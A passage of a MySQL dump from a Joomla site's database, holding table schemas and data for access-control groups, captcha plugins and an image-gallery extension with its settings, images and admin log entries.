00:00:00','','','show_title=\nlink_titles=\nshow_intro=\nshow_section=\nlink_section=\nshow_category=\nlink_category=\nshow_vote=\nshow_author=0\nshow_create_date=0\nshow_modify_date=0\nshow_pdf_icon=\nshow_print_icon=\nshow_email_icon=\nlanguage=\nkeyref=\nreadmore=',4,0,0,'','',0,6,'robots=\nauthor=');
/*!40000 ALTER TABLE `jos_content` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_content_frontpage`
--

DROP TABLE IF EXISTS `jos_content_frontpage`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_content_frontpage` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `ordering` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_content_frontpage`
--

LOCK TABLES `jos_content_frontpage` WRITE;
/*!40000 ALTER TABLE `jos_content_frontpage` DISABLE KEYS */;
INSERT INTO `jos_content_frontpage` VALUES (50,2),(3,4),(4,5),(51,1),(44,3);
/*!40000 ALTER TABLE `jos_content_frontpage` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_content_rating`
--

DROP TABLE IF EXISTS `jos_content_rating`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_content_rating` (
  `content_id` int(11) NOT NULL DEFAULT '0',
  `rating_sum` int(11) unsigned NOT NULL DEFAULT '0',
  `rating_count` int(11) unsigned NOT NULL DEFAULT '0',
  `lastip` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`content_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_content_rating`
--

LOCK TABLES `jos_content_rating` WRITE;
/*!40000 ALTER TABLE `jos_content_rating` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_content_rating` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro`
--

DROP TABLE IF EXISTS `jos_core_acl_aro`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `section_value` varchar(240) NOT NULL DEFAULT '0',
  `value` varchar(240) NOT NULL DEFAULT '',
  `order_value` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `hidden` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `jos_section_value_value_aro` (`section_value`(100),`value`(100)),
  KEY `jos_gacl_hidden_aro` (`hidden`)
) ENGINE=MyISAM AUTO_INCREMENT=15 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro`
--

LOCK TABLES `jos_core_acl_aro` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro` DISABLE KEYS */;
INSERT INTO `jos_core_acl_aro` VALUES (10,'users','62',0,'Donna Nakagiri',0),(11,'users','63',0,'Jack B',0),(12,'users','64',0,'Wes Nakagiri',0),(13,'users','65',0,'test',0);
/*!40000 ALTER TABLE `jos_core_acl_aro` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro_groups`
--

DROP TABLE IF EXISTS `jos_core_acl_aro_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro_groups` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `parent_id` int(11) NOT NULL DEFAULT '0',
  `name` varchar(255) NOT NULL DEFAULT '',
  `lft` int(11) NOT NULL DEFAULT '0',
  `rgt` int(11) NOT NULL DEFAULT '0',
  `value` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`),
  KEY `jos_gacl_parent_id_aro_groups` (`parent_id`),
  KEY `jos_gacl_lft_rgt_aro_groups` (`lft`,`rgt`)
) ENGINE=MyISAM AUTO_INCREMENT=31 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro_groups`
--

LOCK TABLES `jos_core_acl_aro_groups` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro_groups` DISABLE KEYS */;
INSERT INTO `jos_core_acl_aro_groups` VALUES (17,0,'ROOT',1,22,'ROOT'),(28,17,'USERS',2,21,'USERS'),(29,28,'Public Frontend',3,12,'Public Frontend'),(18,29,'Registered',4,11,'Registered'),(19,18,'Author',5,10,'Author'),(20,19,'Editor',6,9,'Editor'),(21,20,'Publisher',7,8,'Publisher'),(30,28,'Public Backend',13,20,'Public Backend'),(23,30,'Manager',14,19,'Manager'),(24,23,'Administrator',15,18,'Administrator'),(25,24,'Super Administrator',16,17,'Super Administrator');
/*!40000 ALTER TABLE `jos_core_acl_aro_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro_map`
--

DROP TABLE IF EXISTS `jos_core_acl_aro_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro_map` (
  `acl_id` int(11) NOT NULL DEFAULT '0',
  `section_value` varchar(230) NOT NULL DEFAULT '0',
  `value` varchar(100) NOT NULL,
  PRIMARY KEY (`acl_id`,`section_value`,`value`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro_map`
--

LOCK TABLES `jos_core_acl_aro_map` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro_map` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_core_acl_aro_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_aro_sections`
--

DROP TABLE IF EXISTS `jos_core_acl_aro_sections`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_aro_sections` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `value` varchar(230) NOT NULL DEFAULT '',
  `order_value` int(11) NOT NULL DEFAULT '0',
  `name` varchar(230) NOT NULL DEFAULT '',
  `hidden` int(11) NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `jos_gacl_value_aro_sections` (`value`),
  KEY `jos_gacl_hidden_aro_sections` (`hidden`)
) ENGINE=MyISAM AUTO_INCREMENT=11 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_aro_sections`
--

LOCK TABLES `jos_core_acl_aro_sections` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_aro_sections` DISABLE KEYS */;
INSERT INTO `jos_core_acl_aro_sections` VALUES (10,'users',1,'Users',0);
/*!40000 ALTER TABLE `jos_core_acl_aro_sections` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_acl_groups_aro_map`
--

DROP TABLE IF EXISTS `jos_core_acl_groups_aro_map`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_acl_groups_aro_map` (
  `group_id` int(11) NOT NULL DEFAULT '0',
  `section_value` varchar(240) NOT NULL DEFAULT '',
  `aro_id` int(11) NOT NULL DEFAULT '0',
  UNIQUE KEY `group_id_aro_id_groups_aro_map` (`group_id`,`section_value`,`aro_id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_acl_groups_aro_map`
--

LOCK TABLES `jos_core_acl_groups_aro_map` WRITE;
/*!40000 ALTER TABLE `jos_core_acl_groups_aro_map` DISABLE KEYS */;
INSERT INTO `jos_core_acl_groups_aro_map` VALUES (18,'',13),(25,'',10),(25,'',11),(25,'',12);
/*!40000 ALTER TABLE `jos_core_acl_groups_aro_map` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_log_items`
--

DROP TABLE IF EXISTS `jos_core_log_items`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_log_items` (
  `time_stamp` date NOT NULL DEFAULT '0000-00-00',
  `item_table` varchar(50) NOT NULL DEFAULT '',
  `item_id` int(11) unsigned NOT NULL DEFAULT '0',
  `hits` int(11) unsigned NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_log_items`
--

LOCK TABLES `jos_core_log_items` WRITE;
/*!40000 ALTER TABLE `jos_core_log_items` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_core_log_items` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_core_log_searches`
--

DROP TABLE IF EXISTS `jos_core_log_searches`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_core_log_searches` (
  `search_term` varchar(128) NOT NULL DEFAULT '',
  `hits` int(11) unsigned NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_core_log_searches`
--

LOCK TABLES `jos_core_log_searches` WRITE;
/*!40000 ALTER TABLE `jos_core_log_searches` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_core_log_searches` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_easycaptchas`
--

DROP TABLE IF EXISTS `jos_easycaptchas`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_easycaptchas` (
  `id` int(10) NOT NULL AUTO_INCREMENT,
  `name` varchar(70) NOT NULL DEFAULT '0',
  `description` text,
  `published` tinyint(3) NOT NULL DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_easycaptchas`
--

LOCK TABLES `jos_easycaptchas` WRITE;
/*!40000 ALTER TABLE `jos_easycaptchas` DISABLE KEYS */;
INSERT INTO `jos_easycaptchas` VALUES (1,'Secimg-Captcha','This captcha generates an image with a small mathematic task, which has to be solved by the user. This Captcha does not require any graphic librarys.',0,'random_min=100000\r\nrandom_max=999999'),(2,'Dpaulus-Captcha','This captcha generates an image with several numbers which have to be entered. This Captcha requires the GD library with freetype-support.',1,'random_min=100000\r\nrandom_max=999999');
/*!40000 ALTER TABLE `jos_easycaptchas` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_easycaptchas_dpaulus`
--

DROP TABLE IF EXISTS `jos_easycaptchas_dpaulus`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_easycaptchas_dpaulus` (
  `CodeID` varchar(6) NOT NULL DEFAULT '',
  `CodeMD5` varchar(32) NOT NULL DEFAULT '',
  `codedate` decimal(14,0) NOT NULL DEFAULT '0',
  PRIMARY KEY (`CodeID`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_easycaptchas_dpaulus`
--

LOCK TABLES `jos_easycaptchas_dpaulus` WRITE;
/*!40000 ALTER TABLE `jos_easycaptchas_dpaulus` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_easycaptchas_dpaulus` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_easycaptchas_secimg`
--

DROP TABLE IF EXISTS `jos_easycaptchas_secimg`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_easycaptchas_secimg` (
  `CodeID` varchar(6) NOT NULL DEFAULT '',
  `ImageID` varchar(32) NOT NULL DEFAULT '',
  `codedate` decimal(14,0) NOT NULL DEFAULT '0',
  PRIMARY KEY (`CodeID`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_easycaptchas_secimg`
--

LOCK TABLES `jos_easycaptchas_secimg` WRITE;
/*!40000 ALTER TABLE `jos_easycaptchas_secimg` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_easycaptchas_secimg` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_groups`
--

DROP TABLE IF EXISTS `jos_groups`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_groups` (
  `id` tinyint(3) unsigned NOT NULL DEFAULT '0',
  `name` varchar(50) NOT NULL DEFAULT '',
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_groups`
--

LOCK TABLES `jos_groups` WRITE;
/*!40000 ALTER TABLE `jos_groups` DISABLE KEYS */;
INSERT INTO `jos_groups` VALUES (0,'Public'),(1,'Registered'),(2,'Special');
/*!40000 ALTER TABLE `jos_groups` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_configuration`
--

DROP TABLE IF EXISTS `jos_imageshow_configuration`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_configuration` (
  `configuration_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `configuration_title` varchar(150) DEFAULT NULL,
  `flickr_api_key` char(150) DEFAULT NULL,
  `flickr_secret_key` char(150) DEFAULT NULL,
  `flickr_username` char(50) DEFAULT NULL,
  `flickr_caching` tinyint(1) DEFAULT '0',
  `flickr_cache_expiration` char(30) DEFAULT NULL,
  `flickr_image_size` tinyint(2) DEFAULT '0',
  `root_image_folder` char(150) DEFAULT NULL,
  `picasa_user_name` char(100) DEFAULT NULL,
  `source_type` tinyint(2) DEFAULT '0',
  `published` tinyint(1) DEFAULT '0',
  PRIMARY KEY (`configuration_id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_configuration`
--

LOCK TABLES `jos_imageshow_configuration` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_configuration` DISABLE KEYS */;
INSERT INTO `jos_imageshow_configuration` VALUES (3,'Picasa gallery',NULL,NULL,NULL,0,NULL,0,NULL,'joomlashine',3,1),(4,NULL,NULL,NULL,NULL,0,NULL,0,'images',NULL,1,1);
/*!40000 ALTER TABLE `jos_imageshow_configuration` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_images`
--

DROP TABLE IF EXISTS `jos_imageshow_images`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_images` (
  `image_id` int(11) NOT NULL AUTO_INCREMENT,
  `showlist_id` int(11) NOT NULL,
  `image_extid` varchar(255) DEFAULT NULL,
  `album_extid` varchar(255) DEFAULT NULL,
  `image_small` varchar(255) DEFAULT NULL,
  `image_medium` varchar(255) DEFAULT NULL,
  `image_big` text,
  `image_title` varchar(255) DEFAULT NULL,
  `image_description` text,
  `image_link` varchar(255) DEFAULT NULL,
  `ordering` tinyint(1) DEFAULT '0',
  `synchronize` tinyint(1) DEFAULT '0',
  PRIMARY KEY (`image_id`)
) ENGINE=MyISAM AUTO_INCREMENT=38 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_images`
--

LOCK TABLES `jos_imageshow_images` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_images` DISABLE KEYS */;
INSERT INTO `jos_imageshow_images` VALUES (31,3,'5449555763927873042','5449555354091407985','http://lh3.ggpht.com/_8Nsej4QeRGg/S6C2GCSadhI/AAAAAAAAAVo/pfKji2OEzis/s144/image1.jpg','http://lh3.ggpht.com/_8Nsej4QeRGg/S6C2GCSadhI/AAAAAAAAAVo/pfKji2OEzis/s144/image1.jpg','http://lh3.ggpht.com/_8Nsej4QeRGg/S6C2GCSadhI/AAAAAAAAAVo/pfKji2OEzis/image1.jpg','The city\'s future shouldn\'t be at the expense of other political issues','','http://picasaweb.google.com/lh/photo/bm2jDF3jnibcNDa8iiOuFQ',2,1),(32,3,'5449555769516009442','5449555354091407985','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2GXGup-I/AAAAAAAAAVs/H-_BitQViNk/s144/image2.jpg','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2GXGup-I/AAAAAAAAAVs/H-_BitQViNk/s144/image2.jpg','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2GXGup-I/AAAAAAAAAVs/H-_BitQViNk/image2.jpg','It\'s not the skyscraper you look at, it\'s the architect','','http://picasaweb.google.com/lh/photo/Odc-phKlO_jUgGe-ailI1w',2,1),(33,3,'5449555777959165794','5449555354091407985','http://lh6.ggpht.com/_8Nsej4QeRGg/S6C2G2ju_2I/AAAAAAAAAVw/TYnIbHFqt5c/s144/image3.jpg','http://lh6.ggpht.com/_8Nsej4QeRGg/S6C2G2ju_2I/AAAAAAAAAVw/TYnIbHFqt5c/s144/image3.jpg','http://lh6.ggpht.com/_8Nsej4QeRGg/S6C2G2ju_2I/AAAAAAAAAVw/TYnIbHFqt5c/image3.jpg','There is never enough time, unless you\'re serving it','','http://picasaweb.google.com/lh/photo/pyMmlF2mDEHOYqfdk8HFeg',3,1),(34,3,'5449555784414501362','5449555354091407985','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2HOmzmfI/AAAAAAAAAV0/NPxXMPx8_Ec/s144/image4.jpg','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2HOmzmfI/AAAAAAAAAV0/NPxXMPx8_Ec/s144/image4.jpg','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2HOmzmfI/AAAAAAAAAV0/NPxXMPx8_Ec/image4.jpg','That\'s what happens when you\'re a worldwide company. You spend a lot of time on planes','','http://picasaweb.google.com/lh/photo/fVC3sNo5SRSnNdjUI9SFiA',4,1),(35,3,'5449555791909310834','5449555354091407985','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2HqhtUXI/AAAAAAAAAV4/xMD9FWlG6No/s144/image5.jpg','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2HqhtUXI/AAAAAAAAAV4/xMD9FWlG6No/s144/image5.jpg','http://lh4.ggpht.com/_8Nsej4QeRGg/S6C2HqhtUXI/AAAAAAAAAV4/xMD9FWlG6No/image5.jpg','Finance is the art of passing currency from hand to hand until it finally disappears','','http://picasaweb.google.com/lh/photo/joDAmL6zehzIjk9DHHlpww',5,1),(36,4,'images/showcase/Our_sign_and_Cox019.jpg','images/showcase','images/showcase/Our_sign_and_Cox019.jpg','images/showcase/Our_sign_and_Cox019.jpg','images/showcase/Our_sign_and_Cox019.jpg','Our_sign_and_Cox019.jpg',NULL,'http://www.nsconstruct.com/retakeourgov/images/showcase/Our_sign_and_Cox019.jpg',1,0),(37,4,'images/showcase/wes_in_aa.jpg','images/showcase','images/showcase/wes_in_aa.jpg','images/showcase/wes_in_aa.jpg','images/showcase/wes_in_aa.jpg','wes_in_aa.jpg',NULL,'http://www.nsconstruct.com/retakeourgov/images/showcase/wes_in_aa.jpg',1,0);
/*!40000 ALTER TABLE `jos_imageshow_images` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_log`
--

DROP TABLE IF EXISTS `jos_imageshow_log`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_log` (
  `log_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(11) DEFAULT NULL,
  `url` varchar(255) DEFAULT NULL,
  `result` varchar(255) DEFAULT NULL,
  `screen` varchar(100) DEFAULT NULL,
  `action` varchar(50) DEFAULT NULL,
  `time_created` datetime DEFAULT NULL,
  PRIMARY KEY (`log_id`)
) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_log`
--

LOCK TABLES `jos_imageshow_log` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_log` DISABLE KEYS */;
INSERT INTO `jos_imageshow_log` VALUES (1,62,'/retakeourgov/administrator/index.php?option=com_imageshow&controller=showlist','RTG','showlist','add','2010-06-09 14:56:57'),(2,62,'/retakeourgov/administrator/index.php?option=com_imageshow&controller=showcase','RTG','showcase','add','2010-06-09 15:04:16'),(3,62,'/retakeourgov/administrator/index.php?option=com_imageshow&controller=showcase','RTG','showcase','modify','2010-06-09 15:08:02'),(4,62,'/retakeourgov/administrator/index.php?option=com_imageshow&controller=showcase','RTG','showcase','modify','2010-06-09 15:09:37');
/*!40000 ALTER TABLE `jos_imageshow_log` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_messages`
--

DROP TABLE IF EXISTS `jos_imageshow_messages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_messages` (
  `msg_id` int(11) NOT NULL AUTO_INCREMENT,
  `msg_screen` varchar(150) DEFAULT NULL,
  `published` tinyint(1) DEFAULT '1',
  `ordering` int(11) DEFAULT NULL,
  PRIMARY KEY (`msg_id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_messages`
--

LOCK TABLES `jos_imageshow_messages` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_messages` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_imageshow_messages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_parameters`
--

DROP TABLE IF EXISTS `jos_imageshow_parameters`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_parameters` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `general_swf_library` tinyint(1) DEFAULT '0',
  `general_show_technical` tinyint(1) DEFAULT '1',
  `license_key` varchar(250) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_parameters`
--

LOCK TABLES `jos_imageshow_parameters` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_parameters` DISABLE KEYS */;
/*!40000 ALTER TABLE `jos_imageshow_parameters` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_preshowcase`
--

DROP TABLE IF EXISTS `jos_imageshow_preshowcase`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `jos_imageshow_preshowcase` (
  `showcase_id` int(11) unsigned NOT NULL AUTO_INCREMENT,
  `showlist_id` int(11) DEFAULT NULL,
  `showcase_title` varchar(150) DEFAULT NULL,
  `background_color` char(30) DEFAULT NULL,
  `general_overall_width` char(30) DEFAULT NULL,
  `general_overall_height` char(30) DEFAULT NULL,
  `general_round_corner_radius` char(30) DEFAULT NULL,
  `general_border_stroke` char(30) DEFAULT NULL,
  `general_border_color` char(30) DEFAULT NULL,
  `general_number_images_preload` char(30) DEFAULT NULL,
  `general_open_link_in` char(30) DEFAULT NULL,
  `general_link_source` char(30) DEFAULT NULL,
  `general_title_source` char(30) DEFAULT NULL,
  `general_des_source` char(30) DEFAULT NULL,
  `general_images_order` char(30) DEFAULT NULL,
  `imgpanel_presentation_mode` char(30) DEFAULT NULL,
  `imgpanel_img_transition_type_fit` char(30) DEFAULT '',
  `imgpanel_img_transition_timing_fit` char(50) DEFAULT NULL,
  `imgpanel_img_click_action_fit` char(30) DEFAULT '',
  `imgpanel_img_transition_type_expand` char(30) DEFAULT '',
  `imgpanel_img_transition_timing_expand` char(255) DEFAULT '50',
  `imgpanel_img_motion_type_expand` char(30) DEFAULT '',
  `imgpanel_img_motion_timing_expand` char(50) DEFAULT NULL,
  `imgpanel_img_click_action_expand` char(30) DEFAULT '',
  `imgpanel_img_smoothing_expand` char(30) DEFAULT NULL,
  `imgpanel_bg_type` char(30) DEFAULT '',
  `imgpanel_bg_value` char(255) DEFAULT NULL,
  `imgpanel_show_watermark` tinyint(1) DEFAULT '0',
  `imgpanel_watermark_path` char(255) DEFAULT NULL,
  `imgpanel_watermark_position` char(30) DEFAULT '',
  `imgpanel_watermark_offset` char(30) DEFAULT NULL,
  `imgpanel_watermark_opacity` char(30) DEFAULT NULL,
  `imgpanel_show_overlay_effect` tinyint(1) DEFAULT '1',
  `imgpanel_overlay_effect_type` char(30) DEFAULT NULL,
  `imgpanel_show_inner_shawdow` tinyint(1) DEFAULT '0',
  `thumbpanel_show_panel` tinyint(1) DEFAULT '0',
  `thumbpanel_panel_position` char(30) DEFAULT '',
  `thumbpanel_collapsible_position` tinyint(1) DEFAULT '0',
  `thumbpanel_thumb_browsing_mode` char(30) DEFAULT '',
  `thumbpanel_show_thumb_status` tinyint(1) DEFAULT '0',
  `thumbpanel_active_state_color` char(30) DEFAULT NULL,
  `thumbpanel_presentation_mode` char(30) DEFAULT '',
  `thumbpanel_border` char(30) DEFAULT NULL,
  `thumbpanel_enable_big_thumb` tinyint(1) DEFAULT '0',
  `thumbpanel_big_thumb_size` char(30) DEFAULT NULL,
  `thumbpanel_thumb_row` char(30) DEFAULT NULL,
  `thumbpanel_thumb_width` char(30) DEFAULT NULL,
  `thumbpanel_thumb_height` char(30) DEFAULT NULL,
  `thumbpanel_big_thumb_color` char(30) DEFAULT NULL,
  `thumbpanel_thumb_border` char(30) DEFAULT NULL,
  `thumbpanel_thumnail_panel_color` char(30) DEFAULT NULL,
  `thumbpanel_thumnail_normal_state` char(30) DEFAULT NULL,
  `infopanel_panel_position` char(30) DEFAULT '',
  `infopanel_presentation` char(30) DEFAULT NULL,
  `infopanel_bg_color_fill` char(30) DEFAULT NULL,
  `infopanel_panel_click_action` char(30) DEFAULT NULL,
  `infopanel_show_title` tinyint(1) DEFAULT '0',
  `infopanel_title_css` char(250) DEFAULT NULL,
  `infopanel_show_des` tinyint(1) DEFAULT '0',
  `infopanel_des_lenght_limitation` char(30) DEFAULT '',
  `infopanel_des_css` char(250) DEFAULT NULL,
  `infopanel_show_link` tinyint(1) DEFAULT '0',
  `infopanel_link_css` char(250) DEFAULT NULL,
  `toolbarpanel_panel_position` char(30) DEFAULT '',
  `toolbarpanel_presentation` char(30) DEFAULT '0',
  `toolbarpanel_show_image_navigation` tinyint(1) DEFAULT '0',
  `toolbarpanel_slideshow_player` tinyint(1) DEFAULT '0',
  `toolbarpanel_show_fullscreen_switcher` tinyint(1) DEFAULT '0',
  `toolbarpanel_show_tooltip` tinyint(1) DEFAULT '0',
  `slideshow_enable_ken_burn_effect` tinyint(1) DEFAULT '1',
  `slideshow_show_thumb_panel` tinyint(1) DEFAULT '0',
  `slideshow_show_overlay_effect` tinyint(1) DEFAULT '0',
  `slideshow_slide_timing` char(50) DEFAULT '0',
  `slideshow_show_image_navigation` tinyint(1) DEFAULT '0',
  `slideshow_process` tinyint(1) DEFAULT '0',
  `slideshow_show_timer` tinyint(1) DEFAULT '1',
  `slideshow_show_watermark` tinyint(1) DEFAULT '0',
  `slideshow_presentation_mode` char(30) DEFAULT NULL,
  `slideshow_looping` tinyint(1) DEFAULT '1',
  PRIMARY KEY (`showcase_id`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `jos_imageshow_preshowcase`
--

LOCK TABLES `jos_imageshow_preshowcase` WRITE;
/*!40000 ALTER TABLE `jos_imageshow_preshowcase` DISABLE KEYS */;
INSERT INTO `jos_imageshow_preshowcase` VALUES (2,4,'RTG','#ffffff','100%','450','1','2','#000000','3','new-browser','image','image','image','forward','fit-in','random','2','image-zooming','random','1','center-random','2','open-image-link',NULL,'2','#595959,#262626',0,'','top-right','10','75',0,'horizontal-floating-bar',1,1,'bottom',1,'pagination',1,'#ff6200','image','1',1,'150','1','50','40','#ffffff','2','#000000','#ffffff','top','auto','#000000','no-action',1,'font-family: Verdana;\r\nfont-size: 12px;\r\nfont-weight: bold;\r\ntext-align: left;\r\ncolor: #E9E9E9;',1,'50','font-family: Arial;\r\nfont-size: 11px;\r\nfont-weight: normal;\r\ntext-align: left;\r\ncolor: #AFAFAF;',0,'font-family: Verdana;\r\nfont-size: 11px;\r\nfont-weight: bold;\r\ntext-align: right;\r\ncolor: #E06614;','bottom','auto',1,1,1,0,1,0,1,'8',0,0,1,0,'expand-out',1);
/*!40000 ALTER TABLE `jos_imageshow_preshowcase` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `jos_imageshow_showcase`
--

DROP TABLE IF EXISTS `jos_imageshow_showcase`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
